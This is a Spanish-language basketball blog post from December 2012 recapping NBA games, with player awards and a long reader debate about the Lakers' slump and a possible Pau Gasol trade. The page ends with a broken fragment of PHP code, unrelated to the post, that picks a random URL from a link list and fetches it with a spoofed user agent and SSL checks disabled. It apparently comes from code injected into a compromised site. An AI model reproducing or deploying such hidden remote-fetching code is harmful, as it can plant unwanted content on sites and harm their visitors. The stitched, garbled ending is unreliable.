La Crónica: Madison “Hell” Garden

10 de December de 2012 por txusma

Los Knicks se mantienen invictos como locales. Anoche volvió Carmelo Anthony tras un par de ausencias consecutivas y lo hizo en plan imparable. Fue ante su ex-equipo, los Nuggets, que no lo pusieron nada fácil con su habitual buen hacer colectivo. Estos Knicks no son los de antaño y además del brillo de Melo mataron con las propias armas del rival. Excepcional trabajo de Chandler y Kidd, y un escalón por debajo de Smith y Felton algo más fallones que en otras ocasiones. A destacar, una vez más, el 12 de 30 en triples (106-112).

Por su parte, los Thunder anda lanzados. No sufrieron demasiado para lograr su 8ª victoria consecutiva ante unos Pacers algo faltos de dinamita (93-104). Una versión medio regulera de Durant y Westbrook rondan los 50 puntos, casi 20 rebotes y bastantes más asistencias de las que nos tenían acostumbrados. Además brilló un Martin muy efectivo. Tampoco sudaron los Clippers ante unos Raptors cada día más deslabazados (83-102). Los suplentes dieron la puntilla a los canadienses en el último cuarto. 

Casi no es noticia la derrota de rigor de los Lakers. Los Jazz, como casi cualquiera, volvieron a ponerse las botas ante una defensa patética. En ataque los amarillos juegan a la ruleta rusa y si no falla uno falla otro. Anoche se topaban con un gran partido de Duhon, Hill y Meeks… y, sin embargo, fallaba estrepitosamente Jamison (117-110). Horas antes D’Antoni aseguraba que Gasol es titular mientras no se demuestre lo contrario.

La sorpresa de la noche la dieron los Bucks, ganando sobrados en una difícil plaza como es Brooklyn (97-88). Los Nets echaron de menos a Brook Lopez. Ellis y Jennings la liaron como saben. Jugando así pueden ganar a casi cualquiera.

Finalmente nueva victoria trabajada de Orlando, anoche en Phoenix. Excepcional actuación del banco, con Reddick y Nicholson tocando la guitarra. Los Magic se erigen como uno de los equipos más interesantes de entre los aspirantes a playoffs en el Este (98-90).

PREMIOS

MVP: Por todos los lados apareció Brandon Jennings para amargarle la vida a los Nets. El base de Milwaukee acabó con 26 puntos, 6 rebotes, 7 asistencias y 5 robos. Destacable partido también de Mo Williams que estuvo muy bien en el tiro (8 de 11) y finalizó con 22 puntos y 9 asistencias.

Rookie: Cuando más lo necesitaban apareció Andrew Nicholson para dar la victoria a su equipo. Anotó 9 de sus 19 puntos en el último cuarto y se convirtió en el mejor del partido aportando además 9 rebotes, 3 asistencias y 4 robos. Dicen los entendidos que es un hombre al que seguir de cerca.

Sorpresa: Las primeras de los jugadores que ya se llevan otros premios como Andrew Nicholson o Jordan Hill pero no podemos dejar de destacar los 12 puntos y 11 asistencias de Chris Duhon.

Decepción: Hace un par de años la pareja Wesley Johnson-Michael Beasley estaba llamada a ser importante en los Wolves. Hoy los vemos pasar con más penas que gloria por las canchas vestidos con la camiseta de los Suns. Ayer no fue una excepción. Terrible partido también de Jonas Valanciunas que se quedó sin anotar una sola canasta en juego. De estos partidos también se aprende.

Esfuerzo en vano: Perdieron los Lakers así que el premio es para… Jordan Hill. 17 puntos, 9 rebotes y 4 tapones para un jugador que se podría adaptar muy bien al juego de Mike d’Antoni. Demar DeRozan fue el mejor de los Raptors con 24 puntos, 5 rebotes y 4 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. txusma dice:
    #1

    Ayer hablaban de la ojeriza de D’Antoni con Jordan Hill y hoy se sale…

      Citar

  2. Sancho88 dice:
    #2

    Jejeje, cerquita del 20-10 eh? ale, pa que me llameis loco. Y tb partidazo de Nicholson, otro de los jugadores que tienen una pinta increíble

      Citar

  3. Sancho88 dice:
    #3

    http://deportes.elpais.com/deportes/2012/12/10/actualidad/1355117975_727828.html

    Por cierto, esto sería denunciable? Qué copiada de Robert Álvarez o González este, madre del amor hermoso…

      Citar

  4. nba dice:
    #4

    Si si esta visto que los jugadores nos leen, pero parece que siguen sin aplicarse en defensa, otra humillacion mas en defensa en el Staples, al final los aficionados en LA se van a calentar de tantas tonterias.

      Citar

  5. Pikerton64 dice:
    #5

    Pues lo que decía, ¿asumimos que los Lakers van a estar en PO? Para ello tendrían que sacar a Minnesota (algo fácil) o a Dallas (que va por delante sin Dirk) y que no entre Denver, un equipo en el que la prensa confió. Llevan ya 21 partidos, un cuarto de la temporada. Clippers le saca más de 5 partidos. Entran, de acuerdo. ¿Contra OKC, SAS o MEN en primera ronda? Adiós temporada.
    Me recuerda cuando se formó el Big Three en Miami, no sé por qué, con la diferencia de que el equipo de LeBron fue subcampeón, i.e., mejor equipo de la NBA salvo por uno solo. ¿Qué ocurrirá con Howard? ¿D’Antoni?

    Melo se sigue postulando para el MVP, ¿no? (No hay un Westbrook o un Wade en su equipo, aunque sea compacto).

      Citar

  6. Esteban dice:
    #6

    Sancho88:
    Jejeje, cerquita del 20-10 eh? ale, pa que me llameis loco. Y tb partidazo de Nicholson, otro de los jugadores que tienen una pinta increíble

    que no cuentan de jordan hill?

    este muchacho seria muy valoradod en GSW, en los BUCKS, ROCKETS, CELTICS y el THUNDER

    yo lo meteria en un trade, como ultima carta antes de traspasar a pau

      Citar

  7. Denise dice:
    #7

    Sobre Jordan Hill, a mi me parece un buen jugador de equipo, pero lo veo bueno en su rol actual de jugar 15-20 minutos intensos o algunos minutos más en caso de bajas de los compañeros, pero no lo veo buen jugador en el rol de ser titular en un equipo contender jugandose sus 35 minutos por noche. Habría que verlo, pero creo que en ese rol, se iría disolviendo poco a poco.
    Eso sí, este año no se puede acusar a Lakers de tener una pintura poco profunda como los otroras pivots suplentes, llamense Powell, Mbenga, Turiaf, Mihm, Character…

    Sobre Nicholson, me está dando en la boca. Yo veía a Harkless mejor jugador, pero ahora mismo Nicholson se lo come con patatas.
    Valanciunas lleva unos cuantos partidos horribles, definitivamente, creo que se ha estrellado con el rookie-wall

      Citar

  8. Denise dice:
    #8

    Esteban: que no cuentan de jordan hill?este muchacho seria muy valoradod en GSW, en los BUCKS, ROCKETS, CELTICS y el THUNDERyo lo meteria en un trade, como ultima carta antes de traspasar a pau

    Ya lo dije hace unos días. ¿por quién lo traspasas a pelo? Solo cobra 3’5 . Si quieres pillar algo decente por él, debe ser un rookie o sophomore por ese precio

      Citar

  9. Esteban dice:
    #9

    Pikerton64:
    Pues lo que decía, ¿asumimos que los Lakers van a estar en PO? Para ello tendrían que sacar a Minnesota (algo fácil) o a Dallas (que va por delante sin Dirk) y que no entre Denver, un equipo en el que la prensa confió. Llevan ya 21 partidos, un cuarto de la temporada. Clippers le saca más de 5 partidos. Entran, de acuerdo. ¿Contra OKC, SAS o MEN en primera ronda? Adiós temporada.
    Me recuerda cuando se formó el Big Three en Miami, no sé por qué, con la diferencia de que el equipo de LeBron fue subcampeón, i.e., mejor equipo de la NBA salvo por uno solo. ¿Qué ocurrirá con Howard? ¿D’Antoni?

    Melo se sigue postulando para el MVP, ¿no? (No hay un Westbrook o un Wade en su equipo, aunque sea compacto).

    creo que hasta este ritmo hay que empezar a preguntarse si realmente los lakers sera un equipo de PO…

    me atacaran de tremendista si, lo acepto, pero es la realidad

    es verdad que faltan nada mas y nada menos que dos all´star al equipo, pero ambos son dos jugadores que vienen de capa caida, lejanos a sus mejores epocas

    incluso sin nash y gasol los lakers con kobe, howard y jamison deberian ganar mas juegos, y ni asi

    ya han cambiado tecnico
    ya han pasados 21 partidos de la temporada

    y cada vez juegan peor, y el estilo de d´antoni claramente no ayuda

    san antonio, thunder, clippers y menphis, tienen su lugar asegurado

    dallas, utha minesota serian los otros 7

    y lakers deberia jugarse la clasifiacion con los warriors

    preseten atencion que todos los equipos nombrados jugaron y estan jugando mejor que los lakers

      Citar

  10. Esteban dice:
    #10

    Denise: Ya lo dije hace unos días. ¿por quién lo traspasas a pelo? Solo cobra 3’5. Si quieres pillar algo decente por él, debe ser un rookie o sophomore por ese precio

    3,5? toy pensando, pero seguramente hay miles de jugadores majores que varios lakers por ese precio, sobretodo en el puesto de alero, el tirador ANTHONY MORROW de atlanta esta en los 4 millones

    el trade tiene que ser a pelo, hill se mostro bueno, pero no lo suficiente para que alguien con tal de tenerlo se como el contrato de blake

      Citar

  11. Denise dice:
    #11

    Pero para traerte a Morrow ya tienes a Meekes que lo está haciendo muy bien ultimamente..

    Yo lo siento por Pau, pero debe ser el sacrificado, y traerse si es posible a 3 jugadores por él que le den mas profundidad y variedad de recursos tácticos.

      Citar

  12. Sancho88 dice:
    #12

    Pikerton, pues yo creo que la pelea de los Lakers no es ni contra Dallas, GSW ni contra nadie, sino contra ellos mismos. Siguen dependiendo de sí mismos incluso para ser cabezas de serie (sí, no me he vuelto loco). Si todo funciona con Nash, que ahora hayan perdido tantos juegos a la larga se equilibrará y equipos como Memphis o los propios Spurs tendrán que empezar a perder algunos partidos. No sé, la situación es delicada pero aún no catastrófica. Eso sí, Nash tiene que volver ya y poner paz. Creo que todos coincidimos en que lo que hagan ahora en los partidos fuera de casa marcará el resto de la temporada, y de momento no lo están aprovechando. Ahora empiezan gira por el Este, cinco partidos si no me equivoco. Si no logran ganar 4 al menos, que se despidan

      Citar

  13. diestro dice:
    #13

    Personalmente creo que es muy pronto para desahuciar a estos Lakers, para mi en playoffs estarán seguro, vamos ni me planteo que se puedan quedar fuera.

    Este año están bastante igualadas las dos conferencias, y hasta bien avanzada la temporada creo que con poco mas del 50% se estará en playoffs, y de los equipos implicados en la lucha por playoffs, como no cabezas de serie, les veo con mucho mas potencial, para cuando les de por espabilar, cosechar rachas de victorias seguidas que eleven su porcentaje mas rápido que otros.

    Yo les veo capaz de lo peor, porque lo están demostrando, pero todavía les veo capaces de lo mejor. Eso si, o reaccionan pronto, o unos playoff partiendo en todas las eliminatorias sin ventaja de campo y contra equipos aspirantes desde el principio ….

      Citar

  14. txusma dice:
    #14

    Impresionante la fe que se está poniendo en Steve Nash. Espero que sus hombros aguanten semejante responsabilidad.

      Citar

  15. Esteban dice:
    #15

    Sancho88:
    .Ahora empiezan gira por el Este, cinco partidos si no me equivoco. Si no logran ganar 4 al menos, que se despidan

    jajaja es increible, un equipo que de 20 juegos ha perdido 11, va a una gira de 5 partidos, y hay esperanzas de que gane 4 DE VISITANTE!!

    no digo que no pueden hacerlo, pero si que seria un cambio de tuerca ENORME, por mi dudo que ganen 2 juegos, y aseguro que no ganaran mas de 2 de los proximos 5 de visitante

      Citar

  16. elreylagarto dice:
    #16

    Suscribo totalmente la tesis de Esteban…ni de coña van a ganar en la carretera 4 de 5 partidos. Vamos, para mí sería una sorpresa si ganaran 3.

    Un saludo.
    Lagarto.

      Citar

  17. Sancho88 dice:
    #17

    Coño, ni que estuviésemos hablando de los Bobcats o los Suns. Son los Lakers, y de momento, son favoritos en cualquier partido que jueguen. Y si eso no es así, entonces habría que replantearse muchas cosas. Que Lakers pierdan un partido a la semana, ok, se puede admitir, pero lo más normal sería que ganasen todos o casi todos los partidos que juegan, con el equipazo que tienen. Lo de ahora ni es normal ni se puede admitir, que estén por debajo del cincuenta por ciento es vergonzoso, y ahora es cuando tienen que demostrar quienes son. Cuando acabe la gira a ver qué pasa

      Citar

  18. diestro dice:
    #18

    Esteban: … por mi dudo que ganen 2 juegos, y aseguro que no ganaran mas de 2 de los proximos 5 de visitante

    Yo sin tener los conocimientos sobre baloncesto del amigo Esteban, apuesto porque ganan 3 partidos como mínimo, de los 5 seguro. Es más apostaría incluso que ganarán 4 incluido el del Madison, y que se dejaran otro de los partidos supuestamente más asequibles.

      Citar

  19. Esteban dice:
    #19

    Sancho88:
    Coño, ni que estuviésemos hablando de los Bobcats o los Suns. Son los Lakers, y de momento, son favoritos en cualquier partido que jueguen. Y si eso no es así, entonces habría que replantearse muchas cosas. Que Lakers pierdan un partido a la semana, ok, se puede admitir, pero lo más normal sería que ganasen todos o casi todos los partidos que juegan, con el equipazo que tienen. Lo de ahora ni es normal ni se puede admitir, que estén por debajo del cincuenta por ciento es vergonzoso, y ahora es cuando tienen que demostrar quienes son. Cuando acabe la gira a ver qué pasa

    si sancho lo que dices es muy cierto, pero solo en teoria, en los hechos los lakers perdieron todos sus juegos de pretemporada, y van pesimo en juegos oficiales

    tienen problemas de lesiones en nash y gasol y es probable que los vuelvan a perder antes que despues, y su defensa es pesime y no creo que con el dt q tienen la vayan a mejorar

    tiene 4 grandes jugadores, pero pàra jugar a hacer mas de 100 puntos por juego necesitas mas tios capaces de anotar y los lakers no los tienen, ademas de ser demasiados lewntos con gasol de 4 para jguar a velocidad

    de a momento, todo el favorisitsmo q tienen los lakers esta en jaque, y si bien es normal que sean un equipazo, el tioempo pasa y no mejoran en nada… hay que replantearse que es lo normal…

      Citar

  20. Ruxixón dice:
    #20

    Los Raptors aguantando 3 cuartos a los Clippers gracias a una buena intensidad defensiva y llega el cuarto y los Clippers les quitan el logo de la camiseta.Salió en los inicios del partido una estadística muy interesante en cuanto anotación recibida por los Raptors en sus pocas victorias y en las muchas derrotas y la diferencia es abismal,20 puntos entre ambas,aunque poco representativo al ser tan escasas los partidos que saldaron con +1 en su balance.Por cierto que el partido de Calderón me pareció horrible,no sé si tiene la cabeza en otro lado o es que no se adapta a salir desde el banquillo.

      Citar

  21. ralage dice:
    #21

    txusma:
    Impresionante la fe que se está poniendo en Steve Nash. Espero que sus hombros aguanten semejante responsabilidad.

    +1000 , y eso que parece que el mayor problema ahora mismo es la defensa…

      Citar

  22. nba dice:
    #22

    Ralage, no es que lo parezca, es que realmente ahora mismo el mayor problema es que no se defiende un pimiento y se pierden muchos balones, Nash en teoria solucionara una parte de la ecuacion, las perdidas de balon, pero de la defensa se tienen que responsabilizar el resto de jugadores, absolutamente todos, ya que hasta ahora estan escurriendo el bulto que da mala leche verlos

      Citar

  23. Denise dice:
    #23

    No hay que descartar a Lakers tan pronto, eso si, yo esperaría a a vuelta de Nash y Pau, le daría 10 partidos de margen con los 4 buenos jugando juntos, y si de esos 10 partidos obtengo un balance inferior al 7-3, traspasar a Pau por varios jugadores, nunca a Pau a pelo por otro (llamese Stoudemire o Boozer).

    No sé por qué pero tengo una corazonada que me dice que Pau acabará en los Knicks por Amare.

      Citar

  24. Esteban dice:
    #24

    Denise:
    No hay que descartar a Lakers tan pronto, eso si, yo esperaría a a vuelta de Nash y Pau, le daría 10 partidos de margen con los 4 buenos jugando juntos, y si de esos 10 partidos obtengo un balance inferior al 7-3, traspasar a Pau por varios jugadores, nunca a Pau a pelo por otro (llamese Stoudemire o Boozer).

    No sé por qué pero tengo una corazonada que me dice que Pau acabará en los Knicks por Amare.

    claro, es lo que he hablado, pau por un combo, nunca por amare o boozer, quienes tioenen contratos mas largos que el incluso

    un trade del estilo del que hizo atlanta con los nets por jojo, teniendo en cuenta que pau tiene un contrato de 2 años menos que jhonson y es mejor jugador, podria salir algo bueno

    equipos dispuestos a tomar a pau? a su edad y con su contrato, que puedan ofrecer algo?

    ya lo he dicho los suns que NO quieren reconstruir, scola, brown, dudley y hasta beasley serian una opcion

    los raptors, sacandose de ensima bargani y calderon, los podria de cara a PO y cumpliria mi pronostico de la porra ajajaja

    los wolves? habria que involucrar mas tios, barea y williams, mandan a pekovic a otro sitio y que llegue alguien por el

      Citar

  25. Denise dice:
    #25

    Ya, yo creo que el posible traspaso de Pau sería como el de Howard, con 3-4 equipos de por medio donde las aspiraciones de uno serán hacer un equipazo, y las de otro liberar salarios y contratos largos. A tener en cuenta equipos con gente sospechosa de ser traspasada, Raptors (Calderón), Hornets (Gordon), GSW (Bogut), Magic (Turkoglu) Wizards (Nene o Okafor)

      Citar

  26. Esteban dice:
    #26

    Denise:
    Ya, yo creo que el posible traspaso de Pau sería como el de Howard, con 3-4 equipos de por medio donde las aspiraciones de uno serán hacer un equipazo, y las de otro liberar salarios y contratos largos. A tener en cuenta equipos con gente sospechosa de ser traspasada, Raptors (Calderón), Hornets (Gordon), GSW (Bogut), Magic (Turkoglu) Wizards (Nene o Okafor)

    Denise, entiendo tu punto, pero entre todos esos tios quien podrian remotamente querer lkos lakers y entrar por pau? prefiero a pau jugando mal que a gordon, bogut, nene o turkoglu sentados en el banco o en la enfermeria mirando los juegos por television

      Citar

  27. Denise dice:
    #27

    Macho, no van a estar eternamente lesionados. Gordon no porque ya está Kobe, pero Turkoglu e incluso Calderón y su expiring le vendría de lujo a Lakers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>